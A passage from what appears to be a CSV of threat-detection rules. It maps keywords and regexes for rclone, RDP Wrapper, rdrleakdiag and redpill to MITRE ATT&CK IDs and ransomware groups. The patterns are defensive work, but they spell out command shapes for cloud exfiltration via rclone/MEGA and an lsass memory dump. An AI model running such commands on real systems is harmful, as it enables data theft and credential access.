Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone copy *:*",".{0,1000}rclone\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone config*",".{0,1000}rclone\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - 
T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone copy *:*",".{0,1000}rclone\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone copy*",".{0,1000}rclone\scopy.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone obscure*",".{0,1000}rclone\sobscure.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files 
with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone rcat *",".{0,1000}rclone\srcat\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe config create remote mega user *",".{0,1000}rclone\.exe\sconfig\screate\sremote\smega\suser\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 
"*rclone.exe config*",".{0,1000}rclone\.exe\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe copy*",".{0,1000}rclone\.exe\scopy.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe create*",".{0,1000}rclone\.exe\screate.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe mega*",".{0,1000}rclone\.exe\smega.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe remote*",".{0,1000}rclone\.exe\sremote.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe* copy *:*",".{0,1000}rclone\.exe.{0,1000}\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - 
Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone.exe* -l * *:*",".{0,1000}rclone\.exe.{0,1000}\s\-l\s.{0,1000}\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone/imagekit*",".{0,1000}rclone\/imagekit.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#usergagent","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone/rclone*",".{0,1000}rclone\/rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - 
T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone-beta-latest-windows-amd64.zip*",".{0,1000}rclone\-beta\-latest\-windows\-amd64\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*rclone-current-windows-arm64.zip*",".{0,1000}rclone\-current\-windows\-arm64\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 
"*oifjbnnafapeiknapihcmpeodaeblbkn*",".{0,1000}oifjbnnafapeiknapihcmpeodaeblbkn.{0,1000}","greyware_tool_keyword","rderzh VPN Proxy","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* RDPWInst.exe*",".{0,1000}\sRDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "* rdpwrap.dll*",".{0,1000}\srdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*""%~dp0RDPWInst"" -i -o*",".{0,1000}\""\%\~dp0RDPWInst\""\s\-i\s\-o.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*%~dp0RDPWInst.exe*",".{0,1000}\%\~dp0RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/RDPWInst.exe*",".{0,1000}\/RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/RDPWInst-v*.msi*",".{0,1000}\/RDPWInst\-v.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/rdpwrap.dll*",".{0,1000}\/rdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/rdpwrap.git*",".{0,1000}\/rdpwrap\.git.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/RDPWrap-v*.zip*",".{0,1000}\/RDPWrap\-v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*/res/rdpwrap.ini*",".{0,1000}\/res\/rdpwrap\.ini.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\bin\RDPConf.exe*",".{0,1000}\\bin\\RDPConf\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDP Wrapper\*",".{0,1000}\\RDP\sWrapper\\.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPCheck.exe*",".{0,1000}\\RDPCheck\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWInst.exe*",".{0,1000}\\RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWInst-v*.msi*",".{0,1000}\\RDPWInst\-v.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWrap.cpp*",".{0,1000}\\RDPWrap\.cpp.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\rdpwrap.dll*",".{0,1000}\\rdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" 
"*\rdpwrap.ini*",".{0,1000}\\rdpwrap\.ini.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWrap.sln*",".{0,1000}\\RDPWrap\.sln.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\rdpwrap.txt*",".{0,1000}\\rdpwrap\.txt.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\rdpwrap-master*",".{0,1000}\\rdpwrap\-master.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWrapSetup*",".{0,1000}\\RDPWrapSetup.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*\RDPWrap-v*.zip*",".{0,1000}\\RDPWrap\-v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" 
"*1232372059db3ecf28cc2609a36b7f20cef2dfe0618770e3ebaa9488bc7fc2de*",".{0,1000}1232372059db3ecf28cc2609a36b7f20cef2dfe0618770e3ebaa9488bc7fc2de.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*29E4E73B-EBA6-495B-A76C-FBB462196C64*",".{0,1000}29E4E73B\-EBA6\-495B\-A76C\-FBB462196C64.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#GUIDproject","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*35a9481ddbed5177431a9ea4bd09468fe987797d7b1231d64942d17eb54ec269*",".{0,1000}35a9481ddbed5177431a9ea4bd09468fe987797d7b1231d64942d17eb54ec269.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*3699b102bf5ad1120ef560ae3036f27c74f6161b62b31fda8087bd7ae1496ee1*",".{0,1000}3699b102bf5ad1120ef560ae3036f27c74f6161b62b31fda8087bd7ae1496ee1.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*9899ffecf141ab4535ec702facbf2b4233903b428b862f3a87e635d09c6244de*",".{0,1000}9899ffecf141ab4535ec702facbf2b4233903b428b862f3a87e635d09c6244de.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*aaf7e238a5c0bb2a7956e2fdca9b534f227f7b737641962fb0ed965390ace4c6*",".{0,1000}aaf7e238a5c0bb2a7956e2fdca9b534f227f7b737641962fb0ed965390ace4c6.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*f9a82873a1e55bb1b5b8b8781b06799ff665464cff8ce77e07474c089123b643*",".{0,1000}f9a82873a1e55bb1b5b8b8781b06799ff665464cff8ce77e07474c089123b643.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*fed08bd733b8e60b5805007bd01a7bf0d0b1993059bbe319d1179facc6b73361*",".{0,1000}fed08bd733b8e60b5805007bd01a7bf0d0b1993059bbe319d1179facc6b73361.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*Initializing RDP Wrapper*",".{0,1000}Initializing\sRDP\sWrapper.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*'RDP Wrapper Library Installer v1.0'*",".{0,1000}\'RDP\sWrapper\sLibrary\sInstaller\sv1\.0\'.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*RDP Wrapper\RDPConf*",".{0,1000}RDP\sWrapper\\RDPConf.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*RDPWInst -w*",".{0,1000}RDPWInst\s\-w.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*rdpwrap\*\RDPWInst.*",".{0,1000}rdpwrap\\.{0,1000}\\RDPWInst\..{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*stascorp/rdpwrap*",".{0,1000}stascorp\/rdpwrap.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z" "*rdrleakdiag.exe /p * /o * /fullmemdmp /wait 1*",".{0,1000}rdrleakdiag\.exe\s\/p\s.{0,1000}\s\/o\s.{0,1000}\s\/fullmemdmp\s\/wait\s1.{0,1000}","greyware_tool_keyword","rdrleakdiag","Microsoft Windows resource leak diagnostic tool potentially dumping lsass process","T1003","TA0006 - TA0005","N/A","N/A","Credential Access","https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*plpmggfglncceinmilojdkiijhmajkjh*",".{0,1000}plpmggfglncceinmilojdkiijhmajkjh.{0,1000}","greyware_tool_keyword","Red Panda VPN","External VPN usage within corporate 
network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* Get-AVStatus.ps1*",".{0,1000}\sGet\-AVStatus\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* list-recycle-bin.ps1*",".{0,1000}\slist\-recycle\-bin\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 